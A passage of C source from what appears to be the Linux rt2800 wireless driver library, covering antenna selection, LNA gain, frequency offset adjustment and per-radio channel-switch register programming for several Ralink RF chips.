		led_ctrl = rt2x00_get_field16(eeprom, EEPROM_FREQ_LED_MODE);
		if (led_ctrl == 0 || led_ctrl > 0x40) {
			rt2x00_set_field32(&reg, LED_CFG_G_LED_MODE, led_g_mode);
			rt2x00_set_field32(&reg, LED_CFG_R_LED_MODE, led_r_mode);
			rt2800_register_write(rt2x00dev, LED_CFG, reg);
		} else {
			rt2800_mcu_request(rt2x00dev, MCU_BAND_SELECT, 0xff,
					   (led_g_mode << 2) | led_r_mode, 1);
		}
	}
}
/*
 * Select the RX antenna on diversity-capable boards, driving the EESK
 * pin (directly on PCI, via the MCU on USB) and GPIO bit 3.
 *
 * Fix: restored "&reg" where extraction had mangled it into "®".
 */
static void rt2800_set_ant_diversity(struct rt2x00_dev *rt2x00dev,
				     enum antenna ant)
{
	u32 reg;
	u8 eesk_pin = (ant == ANTENNA_A) ? 1 : 0;
	u8 gpio_bit3 = (ant == ANTENNA_A) ? 0 : 1;

	if (rt2x00_is_pci(rt2x00dev)) {
		rt2800_register_read(rt2x00dev, E2PROM_CSR, &reg);
		rt2x00_set_field32(&reg, E2PROM_CSR_DATA_CLOCK, eesk_pin);
		rt2800_register_write(rt2x00dev, E2PROM_CSR, reg);
	} else if (rt2x00_is_usb(rt2x00dev))
		rt2800_mcu_request(rt2x00dev, MCU_ANT_SELECT, 0xff,
				   eesk_pin, 0);

	rt2800_register_read(rt2x00dev, GPIO_CTRL, &reg);
	rt2x00_set_field32(&reg, GPIO_CTRL_DIR3, 0);
	rt2x00_set_field32(&reg, GPIO_CTRL_VAL3, gpio_bit3);
	rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);
}
/*
 * Program the TX/RX antenna configuration into BBP registers 1 and 3,
 * with special handling for RT3572 BT-coexistence boards, diversity
 * capable chips and RT3593 (BBP 86).
 */
void rt2800_config_ant(struct rt2x00_dev *rt2x00dev, struct antenna_setup *ant)
{
	u8 bbp1, bbp3;
	u16 eeprom;

	rt2800_bbp_read(rt2x00dev, 1, &bbp1);
	rt2800_bbp_read(rt2x00dev, 3, &bbp3);

	if (rt2x00_rt(rt2x00dev, RT3572) &&
	    rt2x00_has_cap_bt_coexist(rt2x00dev))
		rt2800_config_3572bt_ant(rt2x00dev);

	/*
	 * TX antenna selection.
	 */
	switch (ant->tx_chain_num) {
	case 1:
		rt2x00_set_field8(&bbp1, BBP1_TX_ANTENNA, 0);
		break;
	case 2:
		if (rt2x00_rt(rt2x00dev, RT3572) &&
		    rt2x00_has_cap_bt_coexist(rt2x00dev))
			rt2x00_set_field8(&bbp1, BBP1_TX_ANTENNA, 1);
		else
			rt2x00_set_field8(&bbp1, BBP1_TX_ANTENNA, 2);
		break;
	case 3:
		rt2x00_set_field8(&bbp1, BBP1_TX_ANTENNA, 2);
		break;
	}

	/*
	 * RX antenna selection.
	 */
	switch (ant->rx_chain_num) {
	case 1:
		if (rt2x00_rt(rt2x00dev, RT3070) ||
		    rt2x00_rt(rt2x00dev, RT3090) ||
		    rt2x00_rt(rt2x00dev, RT3352) ||
		    rt2x00_rt(rt2x00dev, RT3390)) {
			rt2800_eeprom_read(rt2x00dev,
					   EEPROM_NIC_CONF1, &eeprom);
			if (rt2x00_get_field16(eeprom,
					       EEPROM_NIC_CONF1_ANT_DIVERSITY))
				rt2800_set_ant_diversity(rt2x00dev,
						rt2x00dev->default_ant.rx);
		}
		rt2x00_set_field8(&bbp3, BBP3_RX_ANTENNA, 0);
		break;
	case 2:
		if (rt2x00_rt(rt2x00dev, RT3572) &&
		    rt2x00_has_cap_bt_coexist(rt2x00dev)) {
			rt2x00_set_field8(&bbp3, BBP3_RX_ADC, 1);
			rt2x00_set_field8(&bbp3, BBP3_RX_ANTENNA,
				rt2x00dev->curr_band == IEEE80211_BAND_5GHZ);
			rt2800_set_ant_diversity(rt2x00dev, ANTENNA_B);
		} else {
			rt2x00_set_field8(&bbp3, BBP3_RX_ANTENNA, 1);
		}
		break;
	case 3:
		rt2x00_set_field8(&bbp3, BBP3_RX_ANTENNA, 2);
		break;
	}

	/* Write BBP 3 before BBP 1 (original ordering preserved). */
	rt2800_bbp_write(rt2x00dev, 3, bbp3);
	rt2800_bbp_write(rt2x00dev, 1, bbp1);

	if (rt2x00_rt(rt2x00dev, RT3593)) {
		if (ant->rx_chain_num == 1)
			rt2800_bbp_write(rt2x00dev, 86, 0x00);
		else
			rt2800_bbp_write(rt2x00dev, 86, 0x46);
	}
}
EXPORT_SYMBOL_GPL(rt2800_config_ant);
/*
 * Cache the LNA gain for the current channel.  The EEPROM stores
 * separate values per frequency range (2.4 GHz, 5 GHz low/mid/high),
 * and RT3593 keeps its 5 GHz mid/high values in different words.
 */
static void rt2800_config_lna_gain(struct rt2x00_dev *rt2x00dev,
				   struct rt2x00lib_conf *libconf)
{
	short gain;
	u16 eeprom;

	if (libconf->rf.channel <= 14) {
		rt2800_eeprom_read(rt2x00dev, EEPROM_LNA, &eeprom);
		gain = rt2x00_get_field16(eeprom, EEPROM_LNA_BG);
	} else if (libconf->rf.channel <= 64) {
		rt2800_eeprom_read(rt2x00dev, EEPROM_LNA, &eeprom);
		gain = rt2x00_get_field16(eeprom, EEPROM_LNA_A0);
	} else if (libconf->rf.channel <= 128) {
		if (rt2x00_rt(rt2x00dev, RT3593)) {
			rt2800_eeprom_read(rt2x00dev, EEPROM_EXT_LNA2, &eeprom);
			gain = rt2x00_get_field16(eeprom, EEPROM_EXT_LNA2_A1);
		} else {
			rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG2, &eeprom);
			gain = rt2x00_get_field16(eeprom,
						  EEPROM_RSSI_BG2_LNA_A1);
		}
	} else {
		if (rt2x00_rt(rt2x00dev, RT3593)) {
			rt2800_eeprom_read(rt2x00dev, EEPROM_EXT_LNA2, &eeprom);
			gain = rt2x00_get_field16(eeprom, EEPROM_EXT_LNA2_A2);
		} else {
			rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A2, &eeprom);
			gain = rt2x00_get_field16(eeprom,
						  EEPROM_RSSI_A2_LNA_A2);
		}
	}

	rt2x00dev->lna_gain = gain;
}
#define FREQ_OFFSET_BOUND 0x5f

/*
 * Move RFCSR 17 (frequency offset code) toward the device's configured
 * offset.  USB devices hand the change to the MCU; PCI devices step
 * the register one unit at a time with ~1ms settle time per step.
 */
static void rt2800_adjust_freq_offset(struct rt2x00_dev *rt2x00dev)
{
	u8 target, cur;
	u8 rfcsr, old_rfcsr;

	target = rt2x00_get_field8(rt2x00dev->freq_offset, RFCSR17_CODE);
	target = min_t(u8, target, FREQ_OFFSET_BOUND);

	rt2800_rfcsr_read(rt2x00dev, 17, &rfcsr);
	old_rfcsr = rfcsr;
	rt2x00_set_field8(&rfcsr, RFCSR17_CODE, target);

	/* Nothing to do when the register already holds the target. */
	if (rfcsr == old_rfcsr)
		return;

	if (rt2x00_is_usb(rt2x00dev)) {
		rt2800_mcu_request(rt2x00dev, MCU_FREQ_OFFSET, 0xff,
				   target, old_rfcsr);
		return;
	}

	/* Walk the offset code toward the target one step at a time. */
	cur = rt2x00_get_field8(old_rfcsr, RFCSR17_CODE);
	while (cur != target) {
		if (cur < target)
			cur++;
		else
			cur--;
		rt2x00_set_field8(&rfcsr, RFCSR17_CODE, cur);
		rt2800_rfcsr_write(rt2x00dev, 17, rfcsr);
		usleep_range(1000, 1500);
	}
}
/*
 * Channel switch for RF2xxx-style radios: merge frequency offset,
 * antenna selection and TX power into the four RF words, then program
 * them three times while toggling bit 2 of RF3 low -> high -> low with
 * 200us settle time between passes.
 */
static void rt2800_config_channel_rf2xxx(struct rt2x00_dev *rt2x00dev,
					 struct ieee80211_conf *conf,
					 struct rf_channel *rf,
					 struct channel_info *info)
{
	rt2x00_set_field32(&rf->rf4, RF4_FREQ_OFFSET, rt2x00dev->freq_offset);

	/* Mark unused TX/RX chains in the RF2 word. */
	if (rt2x00dev->default_ant.tx_chain_num == 1)
		rt2x00_set_field32(&rf->rf2, RF2_ANTENNA_TX1, 1);

	if (rt2x00dev->default_ant.rx_chain_num == 1) {
		rt2x00_set_field32(&rf->rf2, RF2_ANTENNA_RX1, 1);
		rt2x00_set_field32(&rf->rf2, RF2_ANTENNA_RX2, 1);
	} else if (rt2x00dev->default_ant.rx_chain_num == 2)
		rt2x00_set_field32(&rf->rf2, RF2_ANTENNA_RX2, 1);

	if (rf->channel > 14) {
		/*
		 * When TX power is below 0, we should increase it by 7 to
		 * make it a positive value (Minimum value is -7).
		 * However this means that values between 0 and 7 have
		 * double meaning, and we should set a 7DBm boost flag.
		 */
		rt2x00_set_field32(&rf->rf3, RF3_TXPOWER_A_7DBM_BOOST,
				   (info->default_power1 >= 0));

		if (info->default_power1 < 0)
			info->default_power1 += 7;

		rt2x00_set_field32(&rf->rf3, RF3_TXPOWER_A, info->default_power1);

		rt2x00_set_field32(&rf->rf4, RF4_TXPOWER_A_7DBM_BOOST,
				   (info->default_power2 >= 0));

		if (info->default_power2 < 0)
			info->default_power2 += 7;

		rt2x00_set_field32(&rf->rf4, RF4_TXPOWER_A, info->default_power2);
	} else {
		/* 2.4 GHz band uses the plain G-band power fields. */
		rt2x00_set_field32(&rf->rf3, RF3_TXPOWER_G, info->default_power1);
		rt2x00_set_field32(&rf->rf4, RF4_TXPOWER_G, info->default_power2);
	}

	rt2x00_set_field32(&rf->rf4, RF4_HT40, conf_is_ht40(conf));

	rt2800_rf_write(rt2x00dev, 1, rf->rf1);
	rt2800_rf_write(rt2x00dev, 2, rf->rf2);
	rt2800_rf_write(rt2x00dev, 3, rf->rf3 & ~0x00000004);
	rt2800_rf_write(rt2x00dev, 4, rf->rf4);

	udelay(200);

	rt2800_rf_write(rt2x00dev, 1, rf->rf1);
	rt2800_rf_write(rt2x00dev, 2, rf->rf2);
	rt2800_rf_write(rt2x00dev, 3, rf->rf3 | 0x00000004);
	rt2800_rf_write(rt2x00dev, 4, rf->rf4);

	udelay(200);

	rt2800_rf_write(rt2x00dev, 1, rf->rf1);
	rt2800_rf_write(rt2x00dev, 2, rf->rf2);
	rt2800_rf_write(rt2x00dev, 3, rf->rf3 & ~0x00000004);
	rt2800_rf_write(rt2x00dev, 4, rf->rf4);
}
/*
 * Channel switch for RF3xxx-style radios: program channel number, TX
 * power, chain power-down bits, frequency offset and bandwidth
 * calibration via the RFCSR registers, then trigger RF tuning and a
 * calibration pulse.
 */
static void rt2800_config_channel_rf3xxx(struct rt2x00_dev *rt2x00dev,
					 struct ieee80211_conf *conf,
					 struct rf_channel *rf,
					 struct channel_info *info)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	u8 rfcsr, calib_tx, calib_rx;

	rt2800_rfcsr_write(rt2x00dev, 2, rf->rf1);

	rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR3_K, rf->rf3);
	rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR6_R1, rf->rf2);
	rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);

	/* TX power for the two chains. */
	rt2800_rfcsr_read(rt2x00dev, 12, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR12_TX_POWER, info->default_power1);
	rt2800_rfcsr_write(rt2x00dev, 12, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 13, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR13_TX_POWER, info->default_power2);
	rt2800_rfcsr_write(rt2x00dev, 13, rfcsr);

	/* Power down the TX/RX chains beyond the configured chain count. */
	rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD,
			  rt2x00dev->default_ant.rx_chain_num <= 1);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD,
			  rt2x00dev->default_ant.rx_chain_num <= 2);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD,
			  rt2x00dev->default_ant.tx_chain_num <= 1);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD,
			  rt2x00dev->default_ant.tx_chain_num <= 2);
	rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 23, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR23_FREQ_OFFSET, rt2x00dev->freq_offset);
	rt2800_rfcsr_write(rt2x00dev, 23, rfcsr);

	/*
	 * RT3390 uses fixed calibration values; other chips use the
	 * per-device values read earlier into drv_data.
	 */
	if (rt2x00_rt(rt2x00dev, RT3390)) {
		calib_tx = conf_is_ht40(conf) ? 0x68 : 0x4f;
		calib_rx = conf_is_ht40(conf) ? 0x6f : 0x4f;
	} else {
		if (conf_is_ht40(conf)) {
			calib_tx = drv_data->calibration_bw40;
			calib_rx = drv_data->calibration_bw40;
		} else {
			calib_tx = drv_data->calibration_bw20;
			calib_rx = drv_data->calibration_bw20;
		}
	}

	rt2800_rfcsr_read(rt2x00dev, 24, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR24_TX_CALIB, calib_tx);
	rt2800_rfcsr_write(rt2x00dev, 24, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 31, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR31_RX_CALIB, calib_rx);
	rt2800_rfcsr_write(rt2x00dev, 31, rfcsr);

	/* Kick RF tuning. */
	rt2800_rfcsr_read(rt2x00dev, 7, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR7_RF_TUNING, 1);
	rt2800_rfcsr_write(rt2x00dev, 7, rfcsr);

	/* Pulse the RF calibration bit: set, wait 1ms, clear. */
	rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR30_RF_CALIBRATION, 1);
	rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);
	msleep(1);
	rt2x00_set_field8(&rfcsr, RFCSR30_RF_CALIBRATION, 0);
	rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);
}
/*
 * Channel switch for the RF3052 radio: program band-dependent BBP and
 * RFCSR values, TX power, chain power-down bits, frequency offset,
 * bandwidth calibration and the band-select GPIO, then trigger RF
 * tuning.
 *
 * Fixes: restored "&reg" where extraction had mangled it into "®"
 * (GPIO_CTRL section); annotated the intentional switch fallthroughs.
 */
static void rt2800_config_channel_rf3052(struct rt2x00_dev *rt2x00dev,
					 struct ieee80211_conf *conf,
					 struct rf_channel *rf,
					 struct channel_info *info)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	u8 rfcsr;
	u32 reg;

	if (rf->channel <= 14) {
		/* Restore the saved 2.4 GHz BBP 25/26 values. */
		rt2800_bbp_write(rt2x00dev, 25, drv_data->bbp25);
		rt2800_bbp_write(rt2x00dev, 26, drv_data->bbp26);
	} else {
		rt2800_bbp_write(rt2x00dev, 25, 0x09);
		rt2800_bbp_write(rt2x00dev, 26, 0xff);
	}

	rt2800_rfcsr_write(rt2x00dev, 2, rf->rf1);
	rt2800_rfcsr_write(rt2x00dev, 3, rf->rf3);

	rt2800_rfcsr_read(rt2x00dev, 6, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR6_R1, rf->rf2);
	if (rf->channel <= 14)
		rt2x00_set_field8(&rfcsr, RFCSR6_TXDIV, 2);
	else
		rt2x00_set_field8(&rfcsr, RFCSR6_TXDIV, 1);
	rt2800_rfcsr_write(rt2x00dev, 6, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 5, &rfcsr);
	if (rf->channel <= 14)
		rt2x00_set_field8(&rfcsr, RFCSR5_R1, 1);
	else
		rt2x00_set_field8(&rfcsr, RFCSR5_R1, 2);
	rt2800_rfcsr_write(rt2x00dev, 5, rfcsr);

	/*
	 * TX power: the 5 GHz band splits the power value into low bits
	 * plus shifted high bits.
	 */
	rt2800_rfcsr_read(rt2x00dev, 12, &rfcsr);
	if (rf->channel <= 14) {
		rt2x00_set_field8(&rfcsr, RFCSR12_DR0, 3);
		rt2x00_set_field8(&rfcsr, RFCSR12_TX_POWER,
				  info->default_power1);
	} else {
		rt2x00_set_field8(&rfcsr, RFCSR12_DR0, 7);
		rt2x00_set_field8(&rfcsr, RFCSR12_TX_POWER,
				  (info->default_power1 & 0x3) |
				  ((info->default_power1 & 0xC) << 1));
	}
	rt2800_rfcsr_write(rt2x00dev, 12, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 13, &rfcsr);
	if (rf->channel <= 14) {
		rt2x00_set_field8(&rfcsr, RFCSR13_DR0, 3);
		rt2x00_set_field8(&rfcsr, RFCSR13_TX_POWER,
				  info->default_power2);
	} else {
		rt2x00_set_field8(&rfcsr, RFCSR13_DR0, 7);
		rt2x00_set_field8(&rfcsr, RFCSR13_TX_POWER,
				  (info->default_power2 & 0x3) |
				  ((info->default_power2 & 0xC) << 1));
	}
	rt2800_rfcsr_write(rt2x00dev, 13, rfcsr);

	/*
	 * Chain power-down configuration.  With BT coexistence chain 2
	 * is always disabled (and chain 0 on 2.4 GHz); otherwise unused
	 * chains are powered down by chain count.
	 */
	rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 0);
	if (rt2x00_has_cap_bt_coexist(rt2x00dev)) {
		if (rf->channel <= 14) {
			rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 1);
			rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 1);
		}
		rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 1);
		rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 1);
	} else {
		switch (rt2x00dev->default_ant.tx_chain_num) {
		case 1:
			rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
			/* fall through */
		case 2:
			rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 1);
			break;
		}

		switch (rt2x00dev->default_ant.rx_chain_num) {
		case 1:
			rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
			/* fall through */
		case 2:
			rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 1);
			break;
		}
	}
	rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 23, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR23_FREQ_OFFSET, rt2x00dev->freq_offset);
	rt2800_rfcsr_write(rt2x00dev, 23, rfcsr);

	if (conf_is_ht40(conf)) {
		rt2800_rfcsr_write(rt2x00dev, 24, drv_data->calibration_bw40);
		rt2800_rfcsr_write(rt2x00dev, 31, drv_data->calibration_bw40);
	} else {
		rt2800_rfcsr_write(rt2x00dev, 24, drv_data->calibration_bw20);
		rt2800_rfcsr_write(rt2x00dev, 31, drv_data->calibration_bw20);
	}

	/* Band-specific RFCSR setup. */
	if (rf->channel <= 14) {
		rt2800_rfcsr_write(rt2x00dev, 7, 0xd8);
		rt2800_rfcsr_write(rt2x00dev, 9, 0xc3);
		rt2800_rfcsr_write(rt2x00dev, 10, 0xf1);
		rt2800_rfcsr_write(rt2x00dev, 11, 0xb9);
		rt2800_rfcsr_write(rt2x00dev, 15, 0x53);
		rfcsr = 0x4c;
		rt2x00_set_field8(&rfcsr, RFCSR16_TXMIXER_GAIN,
				  drv_data->txmixer_gain_24g);
		rt2800_rfcsr_write(rt2x00dev, 16, rfcsr);
		rt2800_rfcsr_write(rt2x00dev, 17, 0x23);
		rt2800_rfcsr_write(rt2x00dev, 19, 0x93);
		rt2800_rfcsr_write(rt2x00dev, 20, 0xb3);
		rt2800_rfcsr_write(rt2x00dev, 25, 0x15);
		rt2800_rfcsr_write(rt2x00dev, 26, 0x85);
		rt2800_rfcsr_write(rt2x00dev, 27, 0x00);
		rt2800_rfcsr_write(rt2x00dev, 29, 0x9b);
	} else {
		rt2800_rfcsr_read(rt2x00dev, 7, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR7_BIT2, 1);
		rt2x00_set_field8(&rfcsr, RFCSR7_BIT3, 0);
		rt2x00_set_field8(&rfcsr, RFCSR7_BIT4, 1);
		rt2x00_set_field8(&rfcsr, RFCSR7_BITS67, 0);
		rt2800_rfcsr_write(rt2x00dev, 7, rfcsr);
		rt2800_rfcsr_write(rt2x00dev, 9, 0xc0);
		rt2800_rfcsr_write(rt2x00dev, 10, 0xf1);
		rt2800_rfcsr_write(rt2x00dev, 11, 0x00);
		rt2800_rfcsr_write(rt2x00dev, 15, 0x43);
		rfcsr = 0x7a;
		rt2x00_set_field8(&rfcsr, RFCSR16_TXMIXER_GAIN,
				  drv_data->txmixer_gain_5g);
		rt2800_rfcsr_write(rt2x00dev, 16, rfcsr);
		rt2800_rfcsr_write(rt2x00dev, 17, 0x23);
		if (rf->channel <= 64) {
			rt2800_rfcsr_write(rt2x00dev, 19, 0xb7);
			rt2800_rfcsr_write(rt2x00dev, 20, 0xf6);
			rt2800_rfcsr_write(rt2x00dev, 25, 0x3d);
		} else if (rf->channel <= 128) {
			rt2800_rfcsr_write(rt2x00dev, 19, 0x74);
			rt2800_rfcsr_write(rt2x00dev, 20, 0xf4);
			rt2800_rfcsr_write(rt2x00dev, 25, 0x01);
		} else {
			rt2800_rfcsr_write(rt2x00dev, 19, 0x72);
			rt2800_rfcsr_write(rt2x00dev, 20, 0xf3);
			rt2800_rfcsr_write(rt2x00dev, 25, 0x01);
		}
		rt2800_rfcsr_write(rt2x00dev, 26, 0x87);
		rt2800_rfcsr_write(rt2x00dev, 27, 0x01);
		rt2800_rfcsr_write(rt2x00dev, 29, 0x9f);
	}

	/* Drive GPIO 7 according to the selected band. */
	rt2800_register_read(rt2x00dev, GPIO_CTRL, &reg);
	rt2x00_set_field32(&reg, GPIO_CTRL_DIR7, 0);
	if (rf->channel <= 14)
		rt2x00_set_field32(&reg, GPIO_CTRL_VAL7, 1);
	else
		rt2x00_set_field32(&reg, GPIO_CTRL_VAL7, 0);
	rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);

	/* Kick RF tuning. */
	rt2800_rfcsr_read(rt2x00dev, 7, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR7_RF_TUNING, 1);
	rt2800_rfcsr_write(rt2x00dev, 7, rfcsr);
}
/*
 * Channel switch programming for the RF3053 chipset (3x3 RT3593 designs).
 *
 * Zeroes the per-chain fine power control, programs the PLL (RF8/9/11),
 * per-band TX power (RF53/54/55), chain power-down bits (RF1), the
 * TX/RX AGC filter calibration captured at init time, band selection and
 * finally kicks a VCO calibration.
 *
 * Fix vs. the previous revision: in the ch36-64 branch the composed
 * rfcsr value (which may carry the txbf RFCSR39_RX_DIV bit) was thrown
 * away and the literal 0x36 written instead, unlike the three sibling
 * branches; RF39 is now written from rfcsr everywhere.
 */
static void rt2800_config_channel_rf3053(struct rt2x00_dev *rt2x00dev,
					 struct ieee80211_conf *conf,
					 struct rf_channel *rf,
					 struct channel_info *info)
{
	struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
	u8 txrx_agc_fc;
	u8 txrx_h20m;
	u8 rfcsr;
	u8 bbp;
	const bool txbf_enabled = false; /* TODO */

	/* TODO: use TX{0,1,2}FinePowerControl values from EEPROM */
	rt2800_bbp_read(rt2x00dev, 109, &bbp);
	rt2x00_set_field8(&bbp, BBP109_TX0_POWER, 0);
	rt2x00_set_field8(&bbp, BBP109_TX1_POWER, 0);
	rt2800_bbp_write(rt2x00dev, 109, bbp);

	rt2800_bbp_read(rt2x00dev, 110, &bbp);
	rt2x00_set_field8(&bbp, BBP110_TX2_POWER, 0);
	rt2800_bbp_write(rt2x00dev, 110, bbp);

	if (rf->channel <= 14) {
		/* Restore BBP 25 & 26 for 2.4 GHz */
		rt2800_bbp_write(rt2x00dev, 25, drv_data->bbp25);
		rt2800_bbp_write(rt2x00dev, 26, drv_data->bbp26);
	} else {
		/* Hard code BBP 25 & 26 for 5GHz */

		/* Enable IQ Phase correction */
		rt2800_bbp_write(rt2x00dev, 25, 0x09);
		/* Setup IQ Phase correction value */
		rt2800_bbp_write(rt2x00dev, 26, 0xff);
	}

	rt2800_rfcsr_write(rt2x00dev, 8, rf->rf1);
	rt2800_rfcsr_write(rt2x00dev, 9, rf->rf3 & 0xf);

	rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR11_R, (rf->rf2 & 0x3));
	rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR11_PLL_IDOH, 1);
	if (rf->channel <= 14)
		rt2x00_set_field8(&rfcsr, RFCSR11_PLL_MOD, 1);
	else
		rt2x00_set_field8(&rfcsr, RFCSR11_PLL_MOD, 2);
	rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);

	/*
	 * Per-chain TX power: 2.4GHz takes the low 5 bits directly,
	 * 5GHz re-packs bits 3-4 one position up (USB devices keep
	 * bit 6 set as a base value).
	 */
	rt2800_rfcsr_read(rt2x00dev, 53, &rfcsr);
	if (rf->channel <= 14) {
		rfcsr = 0;
		rt2x00_set_field8(&rfcsr, RFCSR53_TX_POWER,
				  info->default_power1 & 0x1f);
	} else {
		if (rt2x00_is_usb(rt2x00dev))
			rfcsr = 0x40;

		rt2x00_set_field8(&rfcsr, RFCSR53_TX_POWER,
				  ((info->default_power1 & 0x18) << 1) |
				  (info->default_power1 & 7));
	}
	rt2800_rfcsr_write(rt2x00dev, 53, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 55, &rfcsr);
	if (rf->channel <= 14) {
		rfcsr = 0;
		rt2x00_set_field8(&rfcsr, RFCSR55_TX_POWER,
				  info->default_power2 & 0x1f);
	} else {
		if (rt2x00_is_usb(rt2x00dev))
			rfcsr = 0x40;

		rt2x00_set_field8(&rfcsr, RFCSR55_TX_POWER,
				  ((info->default_power2 & 0x18) << 1) |
				  (info->default_power2 & 7));
	}
	rt2800_rfcsr_write(rt2x00dev, 55, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 54, &rfcsr);
	if (rf->channel <= 14) {
		rfcsr = 0;
		rt2x00_set_field8(&rfcsr, RFCSR54_TX_POWER,
				  info->default_power3 & 0x1f);
	} else {
		if (rt2x00_is_usb(rt2x00dev))
			rfcsr = 0x40;

		rt2x00_set_field8(&rfcsr, RFCSR54_TX_POWER,
				  ((info->default_power3 & 0x18) << 1) |
				  (info->default_power3 & 7));
	}
	rt2800_rfcsr_write(rt2x00dev, 54, rfcsr);

	/* Power down all chains, then re-enable per configured antenna. */
	rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 0);
	rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
	rt2x00_set_field8(&rfcsr, RFCSR1_PLL_PD, 1);

	switch (rt2x00dev->default_ant.tx_chain_num) {
	case 3:
		rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 1);
		/* fallthrough */
	case 2:
		rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD, 1);
		/* fallthrough */
	case 1:
		rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD, 1);
		break;
	}

	switch (rt2x00dev->default_ant.rx_chain_num) {
	case 3:
		rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 1);
		/* fallthrough */
	case 2:
		rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD, 1);
		/* fallthrough */
	case 1:
		rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD, 1);
		break;
	}
	rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);

	rt2800_adjust_freq_offset(rt2x00dev);

	/* Use the filter calibration matching the current bandwidth. */
	if (conf_is_ht40(conf)) {
		txrx_agc_fc = rt2x00_get_field8(drv_data->calibration_bw40,
						RFCSR24_TX_AGC_FC);
		txrx_h20m = rt2x00_get_field8(drv_data->calibration_bw40,
					      RFCSR24_TX_H20M);
	} else {
		txrx_agc_fc = rt2x00_get_field8(drv_data->calibration_bw20,
						RFCSR24_TX_AGC_FC);
		txrx_h20m = rt2x00_get_field8(drv_data->calibration_bw20,
					      RFCSR24_TX_H20M);
	}

	/* NOTE: the reference driver does not write the new value
	 * back to RFCSR 32
	 */
	rt2800_rfcsr_read(rt2x00dev, 32, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR32_TX_AGC_FC, txrx_agc_fc);

	if (rf->channel <= 14)
		rfcsr = 0xa0;
	else
		rfcsr = 0x80;
	rt2800_rfcsr_write(rt2x00dev, 31, rfcsr);

	rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
	rt2x00_set_field8(&rfcsr, RFCSR30_TX_H20M, txrx_h20m);
